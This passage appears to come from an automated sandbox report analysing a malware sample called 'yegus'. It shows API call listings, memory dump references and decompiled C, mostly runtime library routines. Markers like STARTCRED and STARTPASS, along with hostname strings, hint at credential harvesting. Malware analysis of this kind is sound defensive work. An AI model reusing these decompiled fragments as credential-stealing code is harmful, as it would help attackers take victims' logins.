      • Part of subcall function 10081EB0: HeapReAlloc.KERNEL32(00000008,?,00000032,00000000,771CBFF8,?,?,10001039,<STARTCRED>,00000000,00000000), ref: 10081EDC
      • Part of subcall function 10081EB0: HeapAlloc.KERNEL32(00000008,00000032,00000000,771CBFF8,?,?,10001039,<STARTCRED>,00000000,00000000), ref: 10081EEC
      • Part of subcall function 10082110: lstrlenA.KERNEL32(10001048,10001048,00000000), ref: 10082121
      • Part of subcall function 10082110: HeapAlloc.KERNEL32(00000008,?,00000000,771CBFF8,?), ref: 10082140
      • Part of subcall function 10082110: HeapFree.KERNEL32(00000000,00000000), ref: 1008217D
    • lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
    • lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
    • lstrlenW.KERNEL32(10094C54), ref: 10001093
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10084948, Relevance: 9.3, APIs: 6, Instructions: 284
    APIs
    • __allrem.INT64 ref: 10084AD5
    • __alldiv.INT64 ref: 10084AF1
    • __allrem.INT64 ref: 10084B08
    • __alldiv.INT64 ref: 10084B26
    • __allrem.INT64 ref: 10084B3D
    • __alldiv.INT64 ref: 10084B5B
      • Part of subcall function 10086756: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10086758
      • Part of subcall function 10086756: GetCurrentProcess.KERNEL32(C0000417,10089AEE,1009E658,0000002C,100864A7,00000016,10086C36,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 1008677A
      • Part of subcall function 10086756: TerminateProcess.KERNEL32(00000000,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10086781
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01337FDE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38library
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01337F8F,00000003,?,01337F2F,00000003,01345DD0,0000000C,01338086,00000003,00000002), ref: 01337FFE
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,01337F8F,00000003,?,01337F2F,00000003,01345DD0,0000000C,01338086,00000003,00000002), ref: 01338011
    • FreeLibrary.KERNEL32(00000000,?,?,?,01337F8F,00000003,?,01337F2F,00000003,01345DD0,0000000C,01338086,00000003,00000002,00000000), ref: 01338034
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 100857DB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38library
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,1008578C,00000000,?,1008572C,00000000,1009E490,0000000C,10085874,00000000,00000002), ref: 100857FB
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,1008578C,00000000,?,1008572C,00000000,1009E490,0000000C,10085874,00000000,00000002), ref: 1008580E
    • FreeLibrary.KERNEL32(00000000,?,?,?,1008578C,00000000,?,1008572C,00000000,1009E490,0000000C,10085874,00000000,00000002), ref: 10085831
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01337040, Relevance: 7.7, APIs: 5, Instructions: 222
    C-Code - Quality: 96%
    			E01337040(void* __edx, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t90;
				char* _t96;
				int _t101;
				char* _t103;
				void* _t104;
				intOrPtr _t106;
				intOrPtr _t107;
				int _t108;
				short* _t110;
				int _t111;
				signed int _t112;

				_t104 = __edx;
				_t59 =  *0x1347004; // 0x262637d3
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t90 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t110 = _a8;
				_v24 = _t110;
				if(_t61 == 0 || _t90 != 0) {
					if(_t110 != 0) {
						E01336FBD(_t90,  &_v48, _t104, _a16);
						_t96 = _v28;
						if(_t96 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t110, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E013389A5();
									_t110 = _t110 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t110 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t110 =  &(_t110[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t110 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t110, 0xffffffff, _t96, _t90, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E013389A5();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t90 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t101 =  *(_t107 + 4);
											if(_t101 > 5) {
												_t101 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t101, _t111,  &_v20);
											_t90 = _a12;
											_t108 = _t74;
											if(_t108 == 0 || _v20 != _t111 || _t108 < 0 || _t108 > 5) {
												goto L55;
											}
											if(_t110 + _t108 > _t90) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t108 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t90) {
													continue;
												}
												goto L56;
											}
											_t103 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t103 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 =  &(_t110[0]);
												_v32 = _t76;
												if(_t76 < _t108) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t90 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t110, _t90, _t96, _t90, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t110;
							_v24 = _t90;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t90 = (_t83 - _t110 >> 1) + 1;
							}
							goto L21;
						}
						if(_t90 == 0) {
							goto L51;
						}
						while( *_t110 <= 0xff) {
							_t96[_t111] =  *_t110;
							_t85 =  *_t110;
							_t110 =  &(_t110[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t90) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E013389A5())) = 0x16;
					E013374A5();
					goto L59;
				} else {
					L59:
					return E01333E82(_t90, _v8 ^ _t112, _t110, _t111);
				}
			}







































    0x01337040
    0x01337048
    0x0133704f
    0x01337052
    0x01337056
    0x0133705a
    0x0133705c
    0x0133705f
    0x01337063
    0x01337066
    0x0133706b
    0x0133707a
    0x0133709a
    0x0133709f
    0x013370a4
    0x01337241
    0x0133724a
    0x0133727c
    0x01337284
    0x01337290
    0x01337290
    0x01337295
    0x01337298
    0x00000000
    0x0133728b
    0x0133728b
    0x0133728b
    0x0133729e
    0x013372a2
    0x013372a7
    0x013372a7
    0x00000000
    0x013372ae
    0x01337284
    0x0133724c
    0x01337252
    0x0133726a
    0x0133726a
    0x00000000
    0x0133726a
    0x01337259
    0x0133725e
    0x01337261
    0x01337262
    0x01337268
    0x00000000
    0x00000000
    0x00000000
    0x01337268
    0x00000000
    0x01337259
    0x013370aa
    0x013370b3
    0x013370ed
    0x01337166
    0x0133716a
    0x01337180
    0x01337231
    0x01337231
    0x01337236
    0x01337239
    0x00000000
    0x01337195
    0x01337197
    0x00000000
    0x00000000
    0x0133719d
    0x013371a0
    0x013371a0
    0x013371a3
    0x013371a9
    0x013371ad
    0x013371ad
    0x013371bf
    0x013371c5
    0x013371c8
    0x013371cc
    0x00000000
    0x00000000
    0x013371f1
    0x00000000
    0x00000000
    0x013371f7
    0x013371f9
    0x013371fe
    0x0133721e
    0x01337221
    0x01337224
    0x01337229
    0x00000000
    0x00000000
    0x00000000
    0x0133722f
    0x01337200
    0x01337203
    0x01337203
    0x01337207
    0x0133720c
    0x00000000
    0x00000000
    0x01337215
    0x01337216
    0x01337217
    0x0133721c
    0x00000000
    0x00000000
    0x00000000
    0x0133721c
    0x00000000
    0x01337203
    0x00000000
    0x013371a0
    0x01337180
    0x0133716f
    0x00000000
    0x00000000
    0x01337175
    0x01337175
    0x00000000
    0x01337175
    0x013370f1
    0x01337117
    0x0133712a
    0x0133712e
    0x00000000
    0x0133713e
    0x01337146
    0x0133714c
    0x0133714c
    0x00000000
    0x01337146
    0x0133712e
    0x013370f3
    0x013370f5
    0x013370f8
    0x013370fd
    0x01337100
    0x01337100
    0x01337104
    0x00000000
    0x00000000
    0x00000000
    0x01337104
    0x01337109
    0x01337116
    0x01337116
    0x00000000
    0x01337109
    0x013370b7
    0x00000000
    0x00000000
    0x013370c2
    0x013370cd
    0x013370d0
    0x013370d3
    0x013370d9
    0x00000000
    0x00000000
    0x013370df
    0x013370e2
    0x00000000
    0x00000000
    0x00000000
    0x013370e4
    0x00000000
    0x013370c2
    0x01337081
    0x01337087
    0x00000000
    0x01337071
    0x013372b0
    0x013372c0
    0x013372c0

    APIs
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 01337124
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 01337160
    • GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000,?,013338A4,00000000,?,?,00000000,00000000,?), ref: 01337186
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000001,00000000,?,?,?,00000000,00000000,?,00000000,?,013338A4), ref: 013371BF
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0133727C
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10082290, Relevance: 7.6, APIs: 6, Instructions: 115string
    APIs
    • lstrlenA.KERNEL32(?,?,?,?,"hostname":","hostname":",?), ref: 100822BA
    • lstrlenA.KERNEL32(?,?,?,"hostname":","hostname":",?), ref: 100822D9
    • lstrlenA.KERNEL32(?,?,?,"hostname":","hostname":",?), ref: 100822E4
    • HeapAlloc.KERNEL32(00000008,?,?,?,?,?,"hostname":","hostname":",?), ref: 10082326
    • lstrlenA.KERNEL32(?,?,?,?,?,"hostname":","hostname":",?), ref: 10082339
    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10082393
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10041FA0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 155
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133585E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104
    C-Code - Quality: 66%
    			E0133585E(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr* _v60;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				void* _t71;
				intOrPtr* _t74;
				intOrPtr* _t78;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				signed int _t93;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				char _t101;
				void* _t105;
				intOrPtr _t111;
				char _t114;
				intOrPtr _t116;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr _t129;
				void* _t130;
				intOrPtr* _t131;
				void* _t132;
				signed int* _t136;
				void* _t138;
				void* _t140;
				void* _t141;
				void* _t142;

				_t113 = __edx;
				_push(_t105);
				_push(_t105);
				_t119 = _a4;
				_t143 =  *_t119 - 0x80000003;
				if( *_t119 == 0x80000003) {
					L18:
					return _t70;
				} else {
					_t71 = E01336392(_t97, _t105, __edx, _t119, _t130, _t143, _t130, _t97);
					_t98 = _a20;
					_t144 =  *((intOrPtr*)(_t71 + 8));
					if( *((intOrPtr*)(_t71 + 8)) == 0) {
						L6:
						if( *((intOrPtr*)(_t98 + 0xc)) == 0) {
							E0133876E(_t98, _t105, _t113, _t119, _t130, __eflags);
							asm("int3");
							_t138 = _t140;
							_t141 = _t140 - 0x18;
							_push(_t98);
							_push(_t130);
							_t131 = _v16;
							_push(_t119);
							__eflags = _t131;
							if(__eflags == 0) {
								E0133876E(_t98, _t105, _t113, _t119, _t131, __eflags);
								asm("int3");
								_push(_t138);
								_push(_t98);
								_push(_t131);
								_push(_t119);
								_t121 = _v60;
								_t132 = 0;
								__eflags =  *_t121;
								if( *_t121 <= 0) {
									L37:
									_t74 = 0;
									__eflags = 0;
								} else {
									_t100 = 0;
									while(1) {
										_t78 = E013361BE( *((intOrPtr*)(_t100 +  *((intOrPtr*)(_t121 + 4)) + 4)) + 4, 0x134785c);
										__eflags = _t78;
										if(_t78 == 0) {
											break;
										}
										_t132 = _t132 + 1;
										_t100 = _t100 + 0x10;
										__eflags = _t132 -  *_t121;
										if(_t132 <  *_t121) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
									_t74 = 1;
								}
								L38:
								return _t74;
							} else {
								_t123 =  *_t131;
								_t101 = 0;
								__eflags = _t123;
								if(_t123 > 0) {
									_t114 = 0;
									_v12 = 0;
									_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v0 + 0x1c)) + 0xc));
									_t83 = _t82 + 4;
									__eflags = _t83;
									_v24 =  *_t82;
									_v32 = _t83;
									do {
										_t109 = _t83;
										_t84 = _v24;
										_v20 = _t83;
										_v16 = _t84;
										__eflags = _t84;
										if(_t84 > 0) {
											_t86 =  *((intOrPtr*)(_t131 + 4)) + _t114;
											__eflags = _t86;
											_v28 = _t86;
											while(1) {
												_t87 = E01335E46(_t86,  *_t109,  *((intOrPtr*)(_v0 + 0x1c)));
												_t141 = _t141 + 0xc;
												__eflags = _t87;
												if(_t87 != 0) {
													break;
												}
												_t89 = _v16 - 1;
												_t109 = _v20 + 4;
												_v16 = _t89;
												__eflags = _t89;
												_v20 = _v20 + 4;
												_t86 = _v28;
												if(_t89 > 0) {
													continue;
												} else {
												}
												L29:
												_t114 = _v12;
												goto L30;
											}
											_t101 = 1;
											goto L29;
										}
										L30:
										_t83 = _v32;
										_t114 = _t114 + 0x10;
										_v12 = _t114;
										_t123 = _t123 - 1;
										__eflags = _t123;
									} while (_t123 != 0);
								}
								return _t101;
							}
						} else {
							_t70 = E01336609(_t105, _t98, _a28, _a24,  &_v12,  &_v8);
							_t111 = _v12;
							_t142 = _t140 + 0x14;
							_t116 = _v8;
							if(_t111 < _t116) {
								_t17 = _t70 + 0xc; // 0xc
								_t136 = _t17;
								_t70 = _a24;
								do {
									if(_t70 >=  *((intOrPtr*)(_t136 - 0xc)) && _t70 <=  *((intOrPtr*)(_t136 - 8))) {
										_t93 =  *_t136 << 4;
										if( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) == 0) {
											L13:
											_t94 = _t93 + _t136[1] + 0xfffffff0;
											_t129 = _a4;
											if(( *(_t93 + _t136[1] + 0xfffffff0) & 0x00000040) == 0) {
												_push(1);
												_t35 = _t136 - 0xc; // 0x0
												E01335431(_t98, _t116, _t136, _t129, _a8, _a12, _a16, _t98, _t94, 0, _t35, _a28, _a32);
												_t116 = _v8;
												_t142 = _t142 + 0x2c;
												_t111 = _v12;
											}
										} else {
											_t116 = _v8;
											_t98 = _a20;
											if( *((char*)( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) + 8)) == 0) {
												goto L13;
											}
										}
										_t70 = _a24;
									}
									_t111 = _t111 + 1;
									_t136 =  &(_t136[5]);
									_v12 = _t111;
								} while (_t111 < _t116);
							}
							goto L17;
						}
					} else {
						__imp__EncodePointer(0);
						_t130 = _t71;
						if( *((intOrPtr*)(E01336392(_t98, _t105, __edx, _t119, _t130, _t144) + 8)) == _t130 ||  *_t119 == 0xe0434f4d ||  *_t119 == 0xe0434352) {
							goto L6;
						} else {
							_t70 = E0133652C(_t119, _a8, _a12, _a16, _t98, _a28, _a32);
							_t140 = _t140 + 0x1c;
							if(_t70 != 0) {
								L17:
								goto L18;
							} else {
								goto L6;
							}
						}
					}
				}
			}
















































    0x0133585e
    0x01335861
    0x01335862
    0x01335864
    0x01335867
    0x0133586d
    0x0133596e
    0x01335972
    0x01335873
    0x01335875
    0x0133587a
    0x0133587d
    0x01335881
    0x013358c8
    0x013358cc
    0x01335973
    0x01335978
    0x0133597a
    0x0133597c
    0x0133597f
    0x01335980
    0x01335981
    0x01335984
    0x01335985
    0x01335987
    0x01335a0f
    0x01335a14
    0x01335a15
    0x01335a18
    0x01335a19
    0x01335a1a
    0x01335a1b
    0x01335a1e
    0x01335a20
    0x01335a22
    0x01335a49
    0x01335a49
    0x01335a49
    0x01335a24
    0x01335a24
    0x01335a26
    0x01335a36
    0x01335a3d
    0x01335a3f
    0x00000000
    0x00000000
    0x01335a41
    0x01335a42
    0x01335a45
    0x01335a47
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01335a47
    0x01335a50
    0x01335a50
    0x01335a4b
    0x01335a4f
    0x0133598d
    0x0133598d
    0x0133598f
    0x01335991
    0x01335993
    0x01335998
    0x0133599a
    0x013359a0
    0x013359a5
    0x013359a5
    0x013359a8
    0x013359ab
    0x013359ae
    0x013359ae
    0x013359b0
    0x013359b3
    0x013359b6
    0x013359b9
    0x013359bb
    0x013359c0
    0x013359c0
    0x013359c2
    0x013359c5
    0x013359ce
    0x013359d3
    0x013359d6
    0x013359d8
    0x00000000
    0x00000000
    0x013359e0
    0x013359e1
    0x013359e4
    0x013359e7
    0x013359e9
    0x013359ec
    0x013359ef
    0x00000000
    0x00000000
    0x013359f1
    0x013359f5
    0x013359f5
    0x00000000
    0x013359f5
    0x013359f3
    0x00000000
    0x013359f3
    0x013359f8
    0x013359f8
    0x013359fb
    0x013359fe
    0x01335a01
    0x01335a01
    0x01335a01
    0x013359ae
    0x01335a0e
    0x01335a0e
    0x013358d2
    0x013358e1
    0x013358e6
    0x013358e9
    0x013358ec
    0x013358f1
    0x013358f3
    0x013358f3
    0x013358f6
    0x013358f9
    0x013358fc
    0x01335908
    0x01335911
    0x01335926
    0x0133592c
    0x0133592e
    0x01335934
    0x01335936
    0x0133593b
    0x01335950
    0x01335955
    0x01335958
    0x0133595b
    0x0133595b
    0x01335913
    0x0133591a
    0x01335921
    0x01335924
    0x00000000
    0x00000000
    0x01335924
    0x0133595e
    0x0133595e
    0x01335961
    0x01335962
    0x01335965
    0x01335968
    0x013358f9
    0x00000000
    0x013358f1
    0x01335883
    0x01335885
    0x0133588b
    0x01335895
    0x00000000
    0x013358a7
    0x013358b8
    0x013358bd
    0x013358c2
    0x0133596c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x013358c2
    0x01335895
    0x01335881

    APIs
      • Part of subcall function 01336392: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013388A8
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,01345D54), ref: 01335885
    • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 013358E1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 1000A810, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10004520, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
    APIs
    • HeapReAlloc.KERNEL32(00000008,?,?), ref: 1000453A
    • HeapAlloc.KERNEL32(00000008,?), ref: 1000454A
    • HeapSize.KERNEL32(00000000,?,?), ref: 1000455F
    Strings
    • failed memory resize %u to %u bytes, xrefs: 10004566
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10087445, Relevance: 6.1, APIs: 4, Instructions: 133
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100092F0, Relevance: 6.1, APIs: 4, Instructions: 118
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133B083, Relevance: 6.1, APIs: 4, Instructions: 110
    C-Code - Quality: 82%
    			E0133B083(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t54;
				int _t56;
				signed int _t62;
				int _t65;
				short* _t66;
				signed int _t67;
				short* _t68;

				_t34 =  *0x1347004; // 0x262637d3
				_v8 = _t34 ^ _t67;
				E01336FBD(_t54,  &_v28, __edx, _a4);
				_t56 = _a24;
				if(_t56 == 0) {
					_t53 =  *(_v24 + 8);
					_t56 = _t53;
					_a24 = _t53;
				}
				_t65 = 0;
				_t40 = MultiByteToWideChar(_t56, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E01333E82(_t54, _v8 ^ _t67, _t65, _t66);
				}
				_t54 = _t40 + _t40;
				_t17 = _t54 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t66 = 0;
					L11:
					if(_t66 != 0) {
						E01336200(_t65, _t66, _t65, _t54);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t66, _v12);
						if(_t46 != 0) {
							_t65 = GetStringTypeW(_a8, _t66, _t46, _a20);
						}
					}
					L14:
					E0133B1A0(_t66);
					goto L15;
				}
				_t20 = _t54 + 8; // 0x8
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t54 + 8; // 0x8
				_t62 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t66 = E0133883E(_t62, _t48 & _t62);
					if(_t66 == 0) {
						goto L14;
					}
					 *_t66 = 0xdddd;
					L9:
					_t66 =  &(_t66[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E0133F280();
				_t66 = _t68;
				if(_t66 == 0) {
					goto L14;
				}
				 *_t66 = 0xcccc;
				goto L9;
			}























    0x0133b08b
    0x0133b092
    0x0133b09e
    0x0133b0a3
    0x0133b0a8
    0x0133b0ad
    0x0133b0b0
    0x0133b0b2
    0x0133b0b2
    0x0133b0b7
